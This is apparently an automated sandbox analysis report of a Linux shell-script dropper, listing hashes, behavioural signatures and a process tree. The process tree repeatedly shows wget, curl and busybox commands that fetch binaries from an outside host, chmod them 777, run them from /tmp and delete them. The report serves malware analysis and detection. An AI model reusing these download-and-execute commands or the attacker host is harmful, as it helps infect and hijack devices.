Analysis
- max time kernel: 89s
- max time network: 91s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 01-11-2024 05:40
Static task
static1
Behavioral task
behavioral1
Sample
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
-
Size
10KB
-
MD5
270866c69345a640bdce4a90f85e3b15
-
SHA1
c7cfe722aff43d909a51f45bd9f65101e526b1d2
-
SHA256
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374
-
SHA512
4c1edec9fde9d014df3adfa52d06bcc615d0029e3ffbc1685e50004ace4d94a67dbcd0ee88e35d9d338581d4f0f2ad79deee6ac663ee0cb77d039e19fcf610c9
-
SSDEEP
192:u8FUMkZJMMvOJ8lpHzIJxheMMvO80HzIJx5Ux:u8FZmJMMvOJ8l9MMvO8pO
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description: File opened for reading; ioc: /proc/sys/crypto/fips_enabled; Process: curl
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh/tmp/d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- System Network Configuration Discovery
PID:713
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:737
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- System Network Configuration Discovery
PID:738
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:766
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- System Network Configuration Discovery
PID:767
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:800
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- System Network Configuration Discovery
PID:801
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- System Network Configuration Discovery
PID:818
-
-
/bin/chmodchmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:821
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:822
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:831
-
-
/bin/chmodchmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:842
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:843
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- System Network Configuration Discovery
PID:878
-
-
/bin/chmodchmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:909
-
-
/bin/chmodchmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:951
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:952
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:955
-
-
/bin/chmodchmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:971
-
-
/bin/chmodchmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- System Network Configuration Discovery
PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- System Network Configuration Discovery
PID:995
-
-
/bin/chmodchmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:1010
-
-
/bin/chmodchmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
